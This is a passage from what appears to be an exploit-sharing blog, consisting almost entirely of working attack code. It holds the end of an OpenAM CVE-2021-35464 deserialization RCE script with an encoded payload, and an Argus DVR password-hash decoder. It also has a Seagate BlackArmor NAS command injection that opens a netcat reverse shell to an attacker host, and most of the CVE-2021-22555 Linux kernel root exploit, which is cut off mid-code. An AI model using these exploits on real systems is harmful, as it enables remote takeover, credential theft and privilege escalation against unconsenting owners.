OgANgDwADcA-wA4AQAAOQEOADoBHQA7ASgAPAEzAD0BOAA-AUAAPwFZAEABfwBBAYwAQgG3AEMB8gBEAhUARgIcAEcCIwBIAmYASQKIAE4CiwBKAo0ASwKUAEwCtABNAtYATwLYAFEC3wA6AuUAUwLsAFYC7wBUAvEAVQL0ABwC-gBaAv0AWAL-AFkDAgBbAEsAAADeABYApwARAFwAXQAIANgACwBcAF0ACAIcAGwAXgBfAA8ClABCAF4AXwAQAo0ASQBgAGEADwHyAOYAYgBjAA0CFQDDAGQAZQAOASgBtwBmAGcACgFAAZ8AaABnAAsBWQGGAGkAZwAMAREB1ABqAGsACQA2ArYAbABtAAUARQKnAG4AbwAGAHQCeABwAGcABwEOAd4AcQByAAgC8QADAFwAcwAFACkC0QB0AGsABAACAvgAdQB2AAAACQLxAHcAeAABAAsC7wB5AHoAAgAmAtQAewB8AAMC_gAEAFwAcwAAAH0AAACoABf_ACkABQEHAH4HAH8HAAkBAAD8ABQHAID8ABoHAIEC_AAiBwCCZQcAgxJdBwCDDP0ALQcAhAH-AMsHAIIHAIIHAIJSBwCF_wCaAA8BBwB-BwB_BwAJAQcAgAcAgQcAggcAhAEHAIIHAIIHAIIHAIUHAD0AAQcAhvsASvkAAfgABvoABf8ABgAFAQcAfgcAfwcACQEAAEIHAIcE_wAFAAAAAEIHAIcEAAEAiAAAAAIAiXVxAH4AJAAAAdjK_rq-AAAANAAbCgADABUHABcHABgHABkBABBzZXJpYWxWZXJzaW9uVUlEAQABSgEADUNvbnN0YW50VmFsdWUFceZp7jxtRxgBAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAA0ZvbwEADElubmVyQ2xhc3NlcwEAJUx5c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzJEZvbzsBAApTb3VyY2VGaWxlAQAMR2FkZ2V0cy5qYXZhDAAKAAsHABoBACN5c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzJEZvbwEAEGphdmEvbGFuZy9PYmplY3QBABRqYXZhL2lvL1NlcmlhbGl6YWJsZQEAH3lzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMAIQACAAMAAQAEAAEAGgAFAAYAAQAHAAAAAgAIAAEAAQAKAAsAAQAMAAAAMwABAAEAAAAFKrcAAbEAAAACAA0AAAAKAAIAAACUAAQAlQAOAAAADAABAAAABQAPABIAAAACABMAAAACABQAEQAAAAoAAQACABYAEAAJcHQABFB3bnJwdwEAeHNyABRqYXZhLm1hdGguQmlnSW50ZWdlcoz8nx-pO_sdAwAGSQAIYml0Q291bnRJAAliaXRMZW5ndGhJABNmaXJzdE5vbnplcm9CeXRlTnVtSQAMbG93ZXN0U2V0Qml0SQAGc2lnbnVtWwAJbWFnbml0dWRldAACW0J4cgAQamF2YS5sYW5nLk51bWJlcoaslR0LlOCLAgAAeHD_______________7____-AAAAAXVxAH4AJAAAAAEBeHg$' ## Ignore unsigned certs, if any because OpenAM is default HTTP ssl._create_default_https_context = ssl._create_unverified_context def checkParams(options, args): if args: sHost = args[0] else: sHost = input('[?] Please enter the URL ['+sURL+'] : ') if sHost == '': sHost = sURL if not sHost[-1:] == '/': sHost += '/' if not sHost[:4].lower() == 'http': sHost = 'http://' + sHost if options.command: sCMD = options.command else: sCMD = '' if options.proxy: sProxy = options.proxy else: sProxy = '' return (sHost, sCMD, sProxy) def findEndpoint(oOpener, sHost, sProxy): def testEndpoint(sURL): oRequest = urllib.request.Request(sURL) if sProxy: oRequest.set_proxy(sProxy, 'http') try: oResponse = oOpener.open(oRequest, timeout = iTimeout) except: return False if oResponse.code == 200: if 'ForgeRock' in oResponse.read().decode(errors='ignore'): print('[+] Found potential vulnerable endpoint: ' + sURL) return True return False if testEndpoint(sHost + sEndpoint): return sHost + sEndpoint elif testEndpoint(sHost + 'openam/' + sEndpoint): return sHost + 'openam/' + sEndpoint elif testEndpoint(sHost + 'OpenAM/' + sEndpoint): return sHost + 'OpenAM/' + sEndpoint elif testEndpoint(sHost + 'openam/ccversion/Version'): return sHost + 'openam/ccversion/Version' elif testEndpoint(sHost + 'OpenAM/ccversion/Version'): return sHost + 'OpenAM/ccversion/Version' else: return '' def testVuln(oOpener, sURL, sProxy): oResponse = runCmd(oOpener, sURL, sProxy, 'echo CVE-2021-35464') ## The response is actually not well formed HTTP, needs manual formatting bResp = bytearray(15) ## "CVE-2021-35464\n" should be 15 bytes try: oResponse.readinto(bResp) except: pass #print(bResp.split(b'\x00')[0]) if 'CVE-2021-35464' in bResp.decode(): return True else: return False def runVuln(oOpener, sURL, sProxy, sCMD): oResponse = runCmd(oOpener, sURL, sProxy, sCMD) ## The response is actually not well formed HTTP, needs manual formatting bResp = bytearray(4096) try: oResponse.readinto(bResp) except: pass ## The readinto still should have worked sResp = bResp.split(b'\x00')[0].decode() print(sResp) def runCmd(oOpener, sURL, sProxy, sCMD): oData = b'jato.pageSession=' + strSerializedPayload oHeaders = {'cmd' : sCMD} oRequest = urllib.request.Request(url = sURL, headers = oHeaders, data = oData) if sProxy: oRequest.set_proxy(sProxy, 'http') return oOpener.open(oRequest, timeout = iTimeout) def main(): usage = ( 'usage: %prog [options] URL \n' 'Example: CVE-2021-35464.py -c id http://192.168.0.100:7080/openam\n' 'Example: CVE-2021-35464.py -c dir -p 127.0.0.1:8080 http://192.168.0.100:7080/openam\n' 'When in doubt, just enter a single IP address' ) parser = optparse.OptionParser(usage=usage) parser.add_option('--command', '-c', dest='command', help='Optional: The command to run remotely') parser.add_option('--proxy', '-p', dest='proxy', help='Optional: HTTP proxy to use, e.g. 127.0.0.1:8080') ## Get or ask for the vars (options, args) = parser.parse_args() (sHost, sCMD, sProxy) = checkParams(options, args) ## Verify reachability print('[!] Verifying reachability of ' + sHost) oOpener = urllib.request.build_opener() oRequest = urllib.request.Request(sHost) if sProxy: oRequest.set_proxy(sProxy, 'http') try: oResponse = oOpener.open(oRequest, timeout = iTimeout) except urllib.error.HTTPError: pass except: sys.exit('[-] Error, host ' + sHost + ' seems to be unreachable') print('[+] Endpoint ' + sHost + ' reachable') ## Find endpoint print('[!] Finding correct OpenAM endpoint') sEndpoint = findEndpoint(oOpener, sHost, sProxy) if sEndpoint == '': sys.exit('[-] Error finding the correct OpenAM endpoint or not vulnerable.') ## Verify vulnerability if testVuln(oOpener, sEndpoint, sProxy): print('[+] !SUCCESS! Host ' + sHost + ' is vulnerable to CVE-2021-35464') else: sys.exit('[-] Not vulnerable or this implementation does not work') if sCMD: print('[+] Running command "' + sCMD + '" now:\n') runVuln(oOpener, sEndpoint, sProxy, sCMD) else: print('[!] All done') if __name__ == "__main__": main()
  18. HireHackking

    Argus Surveillance DVR 4.0 - Weak Password Encryption

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Argus Surveillance DVR 4.0 - Weak Password Encryption # Exploit Author: Salman Asad (@deathflash1411) a.k.a LeoBreaker # Date: 12.07.2021 # Version: Argus Surveillance DVR 4.0 # Tested on: Windows 7 x86 (Build 7601) & Windows 10 # Reference: https://deathflash1411.github.io/blog/dvr4-hash-crack # Note: Argus Surveillance DVR 4.0 configuration is present in # C:\ProgramData\PY_Software\Argus Surveillance DVR\DVRParams.ini # I'm too lazy to add special characters :P characters = { 'ECB4':'1','B4A1':'2','F539':'3','53D1':'4','894E':'5', 'E155':'6','F446':'7','C48C':'8','8797':'9','BD8F':'0', 'C9F9':'A','60CA':'B','E1B0':'C','FE36':'D','E759':'E', 'E9FA':'F','39CE':'G','B434':'H','5E53':'I','4198':'J', '8B90':'K','7666':'L','D08F':'M','97C0':'N','D869':'O', '7357':'P','E24A':'Q','6888':'R','4AC3':'S','BE3D':'T', '8AC5':'U','6FE0':'V','6069':'W','9AD0':'X','D8E1':'Y','C9C4':'Z', 'F641':'a','6C6A':'b','D9BD':'c','418D':'d','B740':'e', 'E1D0':'f','3CD9':'g','956B':'h','C875':'i','696C':'j', '906B':'k','3F7E':'l','4D7B':'m','EB60':'n','8998':'o', '7196':'p','B657':'q','CA79':'r','9083':'s','E03B':'t', 'AAFE':'u','F787':'v','C165':'w','A935':'x','B734':'y','E4BC':'z','!':'B398'} # ASCII art is important xD banner = ''' ######################################### # _____ Surveillance DVR 4.0 # # / _ \_______ ____ __ __ ______ # # / /_\ \_ __ \/ ___\| | \/ ___/ # # / | \ | \/ /_/ > | /\___ \ # # \____|__ /__| \___ /|____//____ > # # \/ /_____/ \/ # # Weak Password Encryption # ############ @deathflash1411 ############ ''' print(banner) # Change this :) pass_hash = "418DB740F641E03B956BE1D03F7EF6419083956BECB453D1ECB4ECB4" if (len(pass_hash)%4) != 0: print("[!] Error, check your password hash") exit() split = [] n = 4 for index in range(0, len(pass_hash), n): split.append(pass_hash[index : index + n]) for key in split: if key in characters.keys(): print("[+] " + key + ":" + characters[key]) else: print("[-] " + key + ":Unknown")
  19. HireHackking

    Seagate BlackArmor NAS sg2000-2000.1331 - Command Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Seagate BlackArmor NAS sg2000-2000.1331 - Command Injection # Date: 15.07.2021 # Discovered by: Jeroen - IT Nerdbox # Exploit Author: Metin Yunus Kandemir # Version: sg2000-2000.1331 # Vendor Homepage: https://www.seagate.com/ # Software Link: https://www.seagate.com/tr/tr/support/downloads/item/banas-220-firmware-master-dl/ #!/usr/bin/python3 import requests import sys def exec(target, ncIp, ncPort): print("[!] Please check netcat listener: "+ ncPort) url = "http://" + target + "/backupmgt/localJob.php?session=fail;nc+"+ncIp+"+"+ncPort+"+-e+/bin/sh%00" r = requests.get(url = url) sys.exit(1) def main(args): if len(args) != 4: print("[*] usage: %s targetIp:port ncIp ncPort" % (args[0])) print("[*] Example:python3 exploit.py 192.168.1.13 192.168.1.22 80") sys.exit(1) exec(target=args[1], ncIp=args[2], ncPort=args[3]) if __name__ == "__main__": main(args=sys.argv)
  20. HireHackking

    Linux Kernel 2.6.19 < 5.9 - 'Netfilter Local Privilege Escalation

    HireHackking posted a blog entry in Hacker Technology
    /* * CVE-2021-22555: Turning \x00\x00 into 10000$ * by Andy Nguyen (theflow@) * * theflow@theflow:~$ gcc -m32 -static -o exploit exploit.c * theflow@theflow:~$ ./exploit * [+] Linux Privilege Escalation by theflow@ - 2021 * * [+] STAGE 0: Initialization * [*] Setting up namespace sandbox... * [*] Initializing sockets and message queues... * * [+] STAGE 1: Memory corruption * [*] Spraying primary messages... * [*] Spraying secondary messages... * [*] Creating holes in primary messages... * [*] Triggering out-of-bounds write... * [*] Searching for corrupted primary message... * [+] fake_idx: ffc * [+] real_idx: fc4 * * [+] STAGE 2: SMAP bypass * [*] Freeing real secondary message... * [*] Spraying fake secondary messages... * [*] Leaking adjacent secondary message... * [+] kheap_addr: ffff91a49cb7f000 * [*] Freeing fake secondary messages... * [*] Spraying fake secondary messages... * [*] Leaking primary message... * [+] kheap_addr: ffff91a49c7a0000 * * [+] STAGE 3: KASLR bypass * [*] Freeing fake secondary messages... * [*] Spraying fake secondary messages... * [*] Freeing sk_buff data buffer... * [*] Spraying pipe_buffer objects... * [*] Leaking and freeing pipe_buffer object... * [+] anon_pipe_buf_ops: ffffffffa1e78380 * [+] kbase_addr: ffffffffa0e00000 * * [+] STAGE 4: Kernel code execution * [*] Spraying fake pipe_buffer objects... * [*] Releasing pipe_buffer objects... * [*] Checking for root... * [+] Root privileges gained. * * [+] STAGE 5: Post-exploitation * [*] Escaping container... * [*] Cleaning up... * [*] Popping root shell... * root@theflow:/# id * uid=0(root) gid=0(root) groups=0(root) * root@theflow:/# * * Exploit tested on Ubuntu 5.8.0-48-generic and COS 5.4.89+. */ // clang-format off #define _GNU_SOURCE #include <err.h> #include <errno.h> #include <fcntl.h> #include <inttypes.h> #include <sched.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <net/if.h> #include <netinet/in.h> #include <sys/ipc.h> #include <sys/msg.h> #include <sys/socket.h> #include <sys/syscall.h> #include <linux/netfilter_ipv4/ip_tables.h> // clang-format on #define PAGE_SIZE 0x1000 #define PRIMARY_SIZE 0x1000 #define SECONDARY_SIZE 0x400 #define NUM_SOCKETS 4 #define NUM_SKBUFFS 128 #define NUM_PIPEFDS 256 #define NUM_MSQIDS 4096 #define HOLE_STEP 1024 #define MTYPE_PRIMARY 0x41 #define MTYPE_SECONDARY 0x42 #define MTYPE_FAKE 0x1337 #define MSG_TAG 0xAAAAAAAA // #define KERNEL_COS_5_4_89 1 #define KERNEL_UBUNTU_5_8_0_48 1 // clang-format off #ifdef KERNEL_COS_5_4_89 // 0xffffffff810360f8 : push rax ; jmp qword ptr [rcx] #define PUSH_RAX_JMP_QWORD_PTR_RCX 0x360F8 // 0xffffffff815401df : pop rsp ; pop rbx ; ret #define POP_RSP_POP_RBX_RET 0x5401DF // 0xffffffff816d3a65 : enter 0, 0 ; pop rbx ; pop r14 ; pop rbp ; ret #define ENTER_0_0_POP_RBX_POP_R14_POP_RBP_RET 0x6D3A65 // 0xffffffff814ddfa8 : mov qword ptr [r14], rbx ; pop rbx ; pop r14 ; pop rbp ; ret #define MOV_QWORD_PTR_R14_RBX_POP_RBX_POP_R14_POP_RBP_RET 0x4DDFA8 // 0xffffffff81073972 : push qword ptr [rbp + 0x25] ; pop rbp ; ret #define PUSH_QWORD_PTR_RBP_25_POP_RBP_RET 0x73972 // 0xffffffff8106748c : mov rsp, rbp ; pop rbp ; ret #define MOV_RSP_RBP_POP_RBP_RET 0x6748C // 0xffffffff810c7c80 : pop rdx ; ret #define POP_RDX_RET 0xC7C80 // 0xffffffff8143a2b4 : pop rsi ; ret #define POP_RSI_RET 0x43A2B4 // 0xffffffff81067520 : pop rdi ; ret #define POP_RDI_RET 0x67520 // 0xffffffff8100054b : pop rbp ; ret #define POP_RBP_RET 0x54B // 0xffffffff812383a6 : mov rdi, rax ; jne 0xffffffff81238396 ; pop rbp ; ret #define MOV_RDI_RAX_JNE_POP_RBP_RET 0x2383A6 // 0xffffffff815282e1 : cmp rdx, 1 ; jne 0xffffffff8152831d ; pop rbp ; ret #define CMP_RDX_1_JNE_POP_RBP_RET 0x5282E1 #define FIND_TASK_BY_VPID 0x963C0 #define SWITCH_TASK_NAMESPACES 0x9D080 #define COMMIT_CREDS 0x9EC10 #define PREPARE_KERNEL_CRED 0x9F1F0 #define ANON_PIPE_BUF_OPS 0xE51600 #define INIT_NSPROXY 0x1250590 #elif KERNEL_UBUNTU_5_8_0_48 // 0xffffffff816e9783 : push rsi ; jmp qword ptr [rsi + 0x39] #define PUSH_RSI_JMP_QWORD_PTR_RSI_39 0x6E9783 // 0xffffffff8109b6c0 : pop rsp ; ret #define POP_RSP_RET 0x9B6C0 // 0xffffffff8106db59 : add rsp, 0xd0 ; ret #define ADD_RSP_D0_RET 0x6DB59 // 0xffffffff811a21c3 : enter 0, 0 ; pop rbx ; pop r12 ; pop rbp ; ret #define ENTER_0_0_POP_RBX_POP_R12_POP_RBP_RET 0x1A21C3 // 0xffffffff81084de3 : mov qword ptr [r12], rbx ; pop rbx ; pop r12 ; pop rbp ; ret #define MOV_QWORD_PTR_R12_RBX_POP_RBX_POP_R12_POP_RBP_RET 0x84DE3 // 0xffffffff816a98ff : push qword ptr [rbp + 0xa] ; pop rbp ; ret #define PUSH_QWORD_PTR_RBP_A_POP_RBP_RET 0x6A98FF // 0xffffffff810891bc : mov rsp, rbp ; pop rbp ; ret #define MOV_RSP_RBP_POP_RBP_RET 0x891BC // 0xffffffff810f5633 : pop rcx ; ret #define POP_RCX_RET 0xF5633 // 0xffffffff811abaae : pop rsi ; ret #define POP_RSI_RET 0x1ABAAE // 0xffffffff81089250 : pop rdi ; ret #define POP_RDI_RET 0x89250 // 0xffffffff810005ae : pop rbp ; ret #define POP_RBP_RET 0x5AE // 0xffffffff81557894 : mov rdi, rax ; jne 0xffffffff81557888 ; xor eax, eax ; ret #define MOV_RDI_RAX_JNE_XOR_EAX_EAX_RET 0x557894 // 0xffffffff810724db : cmp rcx, 4 ; jne 0xffffffff810724c0 ; pop rbp ; ret #define CMP_RCX_4_JNE_POP_RBP_RET 0x724DB #define FIND_TASK_BY_VPID 0xBFBC0 #define SWITCH_TASK_NAMESPACES 0xC7A50 #define COMMIT_CREDS 0xC8C80 #define PREPARE_KERNEL_CRED 0xC9110 #define ANON_PIPE_BUF_OPS 0x1078380 #define INIT_NSPROXY 0x1663080 #else #error "No kernel version defined" #endif // clang-format on #define SKB_SHARED_INFO_SIZE 0x140 #define MSG_MSG_SIZE (sizeof(struct msg_msg)) #define MSG_MSGSEG_SIZE (sizeof(struct msg_msgseg)) struct msg_msg { uint64_t m_list_next; uint64_t m_list_prev; uint64_t m_type; uint64_t m_ts; uint64_t next; uint64_t security; }; struct msg_msgseg { uint64_t next; }; struct pipe_buffer { uint64_t page; uint32_t offset; uint32_t len; uint64_t ops; uint32_t flags; uint32_t pad; uint64_t private; }; struct pipe_buf_operations { uint64_t confirm; uint64_t release; uint64_t steal; uint64_t get; }; struct { long mtype; char mtext[PRIMARY_SIZE - MSG_MSG_SIZE]; } msg_primary; struct { long mtype; char mtext[SECONDARY_SIZE - MSG_MSG_SIZE]; } msg_secondary; struct { long mtype; char mtext[PAGE_SIZE - MSG_MSG_SIZE + PAGE_SIZE - MSG_MSGSEG_SIZE]; } msg_fake; void build_msg_msg(struct msg_msg *msg, uint64_t m_list_next, uint64_t m_list_prev, uint64_t m_ts, uint64_t next) { msg->m_list_next = m_list_next; msg->m_list_prev = m_list_prev; msg->m_type = MTYPE_FAKE; msg->m_ts = m_ts; msg->next = next; msg->security = 0; } int write_msg(int msqid, const void *msgp, size_t msgsz, long msgtyp) { *(long *)msgp = msgtyp; if (msgsnd(msqid, msgp, msgsz - sizeof(long), 0) < 0) { perror("[-] msgsnd"); return -1; } return 0; } int peek_msg(int msqid, void *msgp, size_t msgsz, long msgtyp) { if (msgrcv(msqid, msgp, msgsz - sizeof(long), msgtyp, MSG_COPY | IPC_NOWAIT) < 0) { perror("[-] msgrcv"); return -1; } return 0; } int read_msg(int msqid, void *msgp, size_t msgsz, long msgtyp) { if (msgrcv(msqid, msgp, msgsz - sizeof(long), msgtyp, 0) < 0) { perror("[-] msgrcv"); return -1; } return 0; } int spray_skbuff(int ss[NUM_SOCKETS][2], const void *buf, size_t size) { for (int i = 0; i < NUM_SOCKETS; i++) { for (int j = 0; j < NUM_SKBUFFS; j++) { if (write(ss[i][0], buf, size) < 0) { perror("[-] write"); return -1; } } } return 0; } int free_skbuff(int ss[NUM_SOCKETS][2], void *buf, size_t size) { for (int i = 0; i < NUM_SOCKETS; i++) { for (int j = 0; j < NUM_SKBUFFS; j++) { if (read(ss[i][1], buf, size) < 0) { perror("[-] read"); return -1; } } } return 0; } int trigger_oob_write(int s) { struct __attribute__((__packed__)) { struct ipt_replace replace; struct ipt_entry entry; struct xt_entry_match match; char pad[0x108 + PRIMARY_SIZE - 0x200 - 0x2]; struct xt_entry_target target; } data = {0}; data.replace.num_counters = 1; data.replace.num_entries = 1; data.replace.size = (sizeof(data.entry) + sizeof(data.match) + sizeof(data.pad) + sizeof(data.target)); data.entry.next_offset = (sizeof(data.entry) + sizeof(data.match) + sizeof(data.pad) + sizeof(data.target)); data.entry.target_offset = (sizeof(data.entry) + sizeof(data.match) + sizeof(data.pad)); data.match.u.user.match_size = (sizeof(data.match) + sizeof(data.pad)); strcpy(data.match.u.user.name, "icmp"); data.match.u.user.revision = 0; data.target.u.user.target_size = sizeof(data.target); strcpy(data.target.u.user.name, "NFQUEUE"); data.target.u.user.revision = 1; // Partially overwrite the adjacent buffer with 2 bytes of zero. if (setsockopt(s, SOL_IP, IPT_SO_SET_REPLACE, &data, sizeof(data)) != 0) { if (errno == ENOPROTOOPT) { printf("[-] Error ip_tables module is not loaded.\n"); return -1; } } return 0; } // Note: Must not touch offset 0x10-0x18. void build_krop(char *buf, uint64_t kbase_addr, uint64_t scratchpad_addr) { uint64_t *rop; #ifdef KERNEL_COS_5_4_89 *(uint64_t *)&buf[0x00] = kbase_addr + POP_RSP_POP_RBX_RET; rop = (uint64_t *)&buf[0x18]; // Save RBP at scratchpad_addr. *rop++ = kbase_addr + ENTER_0_0_POP_RBX_POP_R14_POP_RBP_RET; *rop++ = scratchpad_addr; // R14 *rop++ = 0xDEADBEEF; // RBP *rop++ = kbase_addr + MOV_QWORD_PTR_R14_RBX_POP_RBX_POP_R14_POP_RBP_RET; *rop++ = 0xDEADBEEF; // RBX *rop++ = 0xDEADBEEF; // R14 *rop++ = 0xDEADBEEF; // RBP // commit_creds(prepare_kernel_cred(NULL)) *rop++ = kbase_addr + POP_RDI_RET; *rop++ = 0; // RDI *rop++ = kbase_addr + PREPARE_KERNEL_CRED; *rop++ = kbase_addr + POP_RDX_RET; *rop++ = 1; // RDX *rop++ = kbase_addr + CMP_RDX_1_JNE_POP_RBP_RET; *rop++ = 0xDEADBEEF; // RBP *rop++ = kbase_addr + MOV_RDI_RAX_JNE_POP_RBP_RET; *rop++ = 0xDEADBEEF; // RBP *rop++ = kbase_addr + COMMIT_CREDS; // switch_task_namespaces(find_task_by_vpid(1), init_nsproxy) *rop++ = kbase_addr + POP_RDI_RET; *rop++ = 1; // RDI *rop++ = kbase_addr + FIND_TASK_BY_VPID; *rop++ = kbase_addr + POP_RDX_RET; *rop++ = 1; // RDX *rop++ = kbase_addr + CMP_RDX_1_JNE_POP_RBP_RET; *rop++ = 0xDEADBEEF; // RBP *rop++ = kbase_addr + MOV_RDI_RAX_JNE_POP_RBP_RET; *rop++ = 0xDEADBEEF; // RBP *rop++ = kbase_addr + POP_RSI_RET; *rop++ = kbase_addr + INIT_NSPROXY; // RSI *rop++ = kbase_addr + SWITCH_TASK_NAMESPACES; // Load RBP from scratchpad_addr and resume execution. *rop++ = kbase_addr + POP_RBP_RET; *rop++ = scratchpad_addr - 0x25; // RBP *rop++ = kbase_addr + PUSH_QWORD_PTR_RBP_25_POP_RBP_RET; *rop++ = kbase_addr + MOV_RSP_RBP_POP_RBP_RET; #elif KERNEL_UBUNTU_5_8_0_48 *(uint64_t *)&buf[0x39] = kbase_addr + POP_RSP_RET; *(uint64_t *)&buf[0x00] = kbase_addr + ADD_RSP_D0_RET; rop = (uint64_t *)&buf[0xD8]; // Save RBP at scratchpad_addr. *rop++ = kbase_addr + ENTER_0_0_POP_RBX_POP_R12_POP_RBP_RET; *rop++ = scratchpad_addr; // R12 *rop++ = 0xDEADBEEF; // RBP *rop++ = kbase_addr + MOV_QWORD_PTR_R12_RBX_POP_RBX_POP_R12_POP_RBP_RET; *rop++ = 0xDEADBEEF; // RBX *rop++ = 0xDEADBEEF; // R12 *rop++ = 0xDEADBEEF; // RBP // commit_creds(prepare_kernel_cred(NULL)) *rop++ = kbase_addr + POP_RDI_RET; *rop++ = 0; // RDI *rop++ = kbase_addr + PREPARE_KERNEL_CRED; *rop++ = kbase_addr + POP_RCX_RET; *rop++ = 4; // RCX *rop++ = kbase_addr + CMP_RCX_4_JNE_POP_RBP_RET; *rop++ = 0xDEADBEEF; // RBP *rop++ = kbase_addr + MOV_RDI_RAX_JNE_XOR_EAX_EAX_RET; *rop++ = kbase_addr + COMMIT_CREDS; // switch_task_namespaces(find_task_by_vpid(1), init_nsproxy) *rop++ = kbase_addr + POP_RDI_RET; *rop++ = 1; // RDI *rop++ = kbase_addr + FIND_TASK_BY_VPID; *rop++ = kbase_addr + POP_RCX_RET; *rop++ = 4; // RCX *rop++ = kbase_addr + CMP_RCX_4_JNE_POP_RBP_RET; *rop++ = 0xDEADBEEF; // RBP *rop++ = kbase_addr + MOV_RDI_RAX_JNE_XOR_EAX_EAX_RET; *rop++ = kbase_addr + POP_RSI_RET; *rop++ = kbase_addr + INIT_NSPROXY; // RSI *rop++ = kbase_addr + SWITCH_TASK_NAMESPACES; // Load RBP from scratchpad_addr and resume execution. *rop++ = kbase_addr + POP_RBP_RET; *rop++ = scratchpad_addr - 0xA; // RBP *rop++ = kbase_addr + PUSH_QWORD_PTR_RBP_A_POP_RBP_RET; *rop++ = kbase_addr + MOV_RSP_RBP_POP_RBP_RET; #endif } int setup_sandbox(void) { if (unshare(CLONE_NEWUSER) < 0) { perror("[-] unshare(CLONE_NEWUSER)"); return -1; } if (unshare(CLONE_NEWNET) < 0) { perror("[-] unshare(CLONE_NEWNET)"); return -1; } cpu_set_t set; CPU_ZERO(&set); CPU_SET(0, &set); if (sched_setaffinity(getpid(), sizeof(set), &set) < 0) { perror("[-] sched_setaffinity"); return -1; } return 0; } int main(int argc, char *argv[]) { int s; int fd; int ss[NUM_SOCKETS][2]; int pipefd[NUM_PIPEFDS][2]; int msqid[NUM_MSQIDS]; char primary_buf[PRIMARY_SIZE - SKB_SHARED_INFO_SIZE]; char secondary_buf[SECONDARY_SIZE - SKB_SHARED_INFO_SIZE]; struct msg_msg *msg; struct pipe_buf_operations *ops; struct pipe_buffer *buf; uint64_t pipe_buffer_ops = 0; uint64_t kheap_addr = 0, kbase_addr = 0; int fake_idx = -1, real_idx = -1; printf("[+] Linux Privilege Escalation by theflow@ - 2021\n"); printf("\n"); printf("[+] STAGE 0: Initialization\n"); printf("[*] Setting up namespace sandbox...\n"); if (setup_sandbox() < 0) goto err_no_rmid; printf("[*] Initializing sockets and message queues...\n"); if ((s = socket(AF_INET, SOCK_STREAM, 0)) < 0) { perror("[-] socket"); goto err_no_rmid; } for (int i = 0; i < NUM_SOCKETS; i++) { if (socketpair(AF_UNIX, SOCK_STREAM, 0, ss[i]) < 0) { perror("[-] socketpair"); goto err_no_rmid; } } for (int i = 0; i < NUM_MSQIDS; i++) { if ((msqid[i] = msgget(IPC_PRIVATE, IPC_CREAT | 0666)) < 0) { perror("[-] msgget"); goto err_no_rmid; } } printf("\n"); printf("[+] STAGE 1: Memory corruption\n"); printf("[*] Spraying primary messages...\n"); for (int i = 0; i < NUM_MSQIDS; i++) { memset(&msg_primary, 0, sizeof(msg_primary)); *(int *)&msg_primary.mtext[0] = MSG_TAG; *(int *)&msg_primary.mtext[4] = i; if (write_msg(msqid[i], &msg_primary, sizeof(msg_primary), MTYPE_PRIMARY) < 0) goto err_rmid; } printf("[*] Spraying secondary messages...\n"); for (int i = 0; i < NUM_MSQIDS; i++) { memset(&msg_secondary, 0, sizeof(msg_secondary)); *(int *)&msg_secondary.mtext[0] = MSG_TAG; *(int *)&msg_secondary.mtext[4] = i; if (write_msg(msqid[i], &msg_secondary, sizeof(msg_secondary), MTYPE_SECONDARY) < 0) goto err_rmid; } printf("[*] Creating holes in primary messages...\n"); for (int i = HOLE_STEP; i < NUM_MSQIDS; i += HOLE_STEP) { if (read_msg(msqid[i], &msg_primary, sizeof(msg_primary), MTYPE_PRIMARY) < 0) goto err_rmid; } printf("[*] Triggering out-of-bounds write...\n"); if (trigger_oob_write(s) < 0) goto err_rmid; printf("[*] Searching for corrupted primary message...\n"); for (int i = 0; i < NUM_MSQIDS; i++) { if (i != 0 && (i % HOLE_STEP) == 0) continue; if (peek_msg(msqid[i], &msg_secondary, sizeof(msg_secondary), 1) < 0) goto err_no_rmid; if (*(int *)&msg_secondary.mtext[0] != MSG_TAG) { printf("[-] Error could not corrupt any primary message.\n"); goto err_no_rmid; } if (*(int *)&msg_secondary.mtext[4] != i) { fake_idx = i; real_idx = *(int *)&msg_secondary.mtext[4]; break; } } if (fake_idx == -1 && real_idx == -1) { printf("[-] Error could not corrupt any primary message.\n"); goto err_no_rmid; } // fake_idx's primary message has a corrupted next pointer; wrongly // pointing to real_idx's secondary message. printf("[+] fake_idx: %x\n", fake_idx); printf("[+] real_idx: %x\n", real_idx); printf("\n"); printf("[+] STAGE 2: SMAP bypass\n"); printf("[*] Freeing real secondary message...\n"); if (read_msg(msqid[real_idx], &msg_secondary, sizeof(msg_secondary), MTYPE_SECONDARY) < 0) goto err_rmid; // Reclaim the previously freed secondary message with a fake msg_msg of // maximum possible size. printf("[*] Spraying fake secondary messages...\n"); memset(secondary_buf, 0, sizeof(secondary_buf)); build_msg_msg((void *)secondary_buf, 0x41414141, 0x42424242, PAGE_SIZE - MSG_MSG_SIZE, 0); if (spray_skbuff(ss, secondary_buf, sizeof(secondary_buf)) < 0) goto err_rmid; // Use the fake secondary message to read out-of-bounds. printf("[*] Leaking adjacent secondary message...\n"); if (peek_msg(msqid[fake_idx], &msg_fake, sizeof(msg_fake), 1) < 0) goto err_rmid; // Check if the leak is valid. if (*(int *)&msg_fake.mtext[SECONDARY_SIZE] != MSG_TAG) { printf("[-] Error could not leak adjacent secondary message.\n"); goto err_rmid; } // The secondary message contains a pointer to the primary message. msg = (struct msg_msg *)&msg_fake.mtext[SECONDARY_SIZE - MSG_MSG_SIZE]; kheap_addr = msg->m_list_next; if (kheap_addr & (PRIMARY_SIZE - 1)) kheap_addr = msg->m_list_prev; printf("[+] kheap_addr: %" PRIx64 "\n", kheap_addr); if ((kheap_addr & 0xFFFF000000000000) != 0xFFFF000000000000) { printf("[-] Error kernel heap address is incorrect.\n"); goto err_rmid; } printf("[*] Freeing fake secondary messages...\n"); free_skbuff(ss, secondary_buf, sizeof(secondary_buf)); // Put kheap_addr at next to leak its content. Assumes zero bytes before // kheap_addr. printf("[*] Spraying fake secondary messages...\n"); memset(secondary_buf, 0, sizeof(secondary_buf)); build_msg_msg((void *)secondary_buf, 0x41414141, 0x42424242, sizeof(msg_fake.mtext), kheap_addr - MSG_MSGSEG_SIZE); if (spray_skbuff(ss, secondary_buf, sizeof(secondary_buf)) < 0) goto err_rmid; // Use the fake secondary message to read from kheap_addr. printf("[*] Leaking primary message...\n"); if (peek_msg(msqid[fake_idx], &msg_fake, 